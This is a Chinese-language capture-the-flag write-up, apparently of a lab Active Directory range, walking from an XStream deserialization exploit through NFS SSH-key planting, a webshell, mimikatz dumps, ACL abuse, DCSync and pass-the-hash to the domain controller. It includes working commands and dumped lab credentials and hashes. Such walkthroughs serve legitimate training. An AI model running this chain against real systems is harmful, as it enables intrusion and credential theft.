又氪金了,要没钱了
入口
80居然没东西,先扫全端口
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 39.99.135.82 is alive
[*] Icmp alive hosts len is: 1
39.99.135.82:22 open
39.99.135.82:80 open
39.99.135.82:21 open
39.99.135.82:8080 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.99.135.82 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle: http://39.99.135.82:8080 code:200 len:3655 title:公司发货单
[+] ftp://39.99.135.82:21:anonymous
[->]1.txt
[->]pom.xml
8080不知道是个什么东西,ftp有匿名登陆,里面两个文件,1.txt里啥也没有,pom.xml
看看pom.xml里的内容,再结合hint,注意到这一条
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.16</version>
</dependency>
立刻去找洞
找到了,CVE-2021-29505,这篇文章讲的不错,直接照着利用就好了,成功拿到root的shell,flag1到手
然后做代理加扫内网
start infoscan
(icmp) Target 172.22.13.14 is alive
(icmp) Target 172.22.13.6 is alive
(icmp) Target 172.22.13.28 is alive
(icmp) Target 172.22.13.57 is alive
[*] Icmp alive hosts len is: 4
172.22.13.28:445 open
172.22.13.6:445 open
172.22.13.28:139 open
172.22.13.6:139 open
172.22.13.28:135 open
172.22.13.6:135 open
172.22.13.57:80 open
172.22.13.28:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.6:88 open
172.22.13.28:3306 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo:
[*]172.22.13.28
[->]WIN-HAUWOLAO
[->]172.22.13.28
[*] NetBios: 172.22.13.6 [+]DC XIAORANG\WIN-DC
[*] NetInfo:
[*]172.22.13.6
[->]WIN-DC
[->]172.22.13.6
[*] WebTitle: http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] WebTitle: http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[+] ftp://172.22.13.14:21:anonymous
[->]1.txt
[->]pom.xml
[*] WebTitle: http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[*] WebTitle: http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[*] NetBios: 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[+] mysql:172.22.13.28:3306:root 123456
四台机器
172.22.13.14 拿下
172.22.13.6 域控
172.22.13.28 OA
172.22.13.57
根据提示说有一个NFS在里面,那个centos不知道是干嘛的估计就是NFS服务了,试试
一眼丁真了。就是
这里不知道为什么mac死活showmount不出来,换了linux
直接找到,挂载就行
mkdir temp
mount -t nfs 172.22.13.57:/home/joyce ./temp -o nolock
一眼丁真,直接在里面新建.ssh文件夹再往里面写ssh公钥
ssh登陆成功
终端里有点卡,做一下端口转发之后上线到viper
linpeas扫一手,发现了这个
/home/joyce *(rw,sync,insecure,no_root_squash)
甚至ftp还有suid权限
一眼提权,开提
往里面传了suid的bash死活执行不了,后来发现我现在换了mac之后已经不能这样做了,架构不一样,令人感叹
后来有换了台电脑发现这条路似乎是走不通的,感叹,还是看看ftp吧
根目录里还有一个pAss.txt和flag02.txt,pAss可以直接看
xiaorang.lab/zhangwen\QT62f3gBhK1
即然ftp有suid权限,那就可以用ftp把flag2传到外网的那台机器,但是那台机器上的ftp服务是不能写入文件的,得自己起一个
python3 -m pyftpdlib -p 2335 -u zzz -P zzz -w
直接put /flag02.txt就行
还给了个hint是relay race,不是很懂
除了域控还剩一台windows,而且开了3389,估计是可以直接rdp上去
发现登不上,试了一通最后找到这个用户可以拿来看smb服务
p4 smbmap -d xiaorang.lab -u zhangwen -p QT62f3gBhK1 -H 172.22.13.28
但是里面也没有什么东西
然后就是很奇怪,mac上的微软rdp连不上,换linux里的remmina就连上了,我不好说
可以看到桌面上一个phpstudy
直接找到地址在C:\phpstudy_pro\WWW
手动往里面写一句话
然后蚁剑连接,很好的system
直接读flag3
居然没有用到mysql的弱口令
直接传mimikatz抓一手密码
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
抓到了chenglei的
Authentication Id : 0 ; 139874 (00000000:00022262)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2023/7/19 11:16:36
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman
直接rdp登上chenglei的号,whoami /groups一下
发现chenglei在ACL Admin组里,能改ACL权限
github翻到一篇笔记,直接照做
这里我这边很奇怪,直接开powershell会提示找不到Add-DomainObjectAcl命令,从cmd里开的powershell又可以了,不好说
有权限了,直接把域内的hash全导出来
python3 ./tools/impacket-0.10.0/examples/secretsdump.py xiaorang.lab/chenglei:Xt61f3LBhg1@172.22.13.6 -just-dc
直接横向过去域控拿flag4
python3 ./tools/impacket-0.10.0/examples/psexec.py -hashes :6341235defdaed66fb7b682665752c9a administrator@172.22.13.6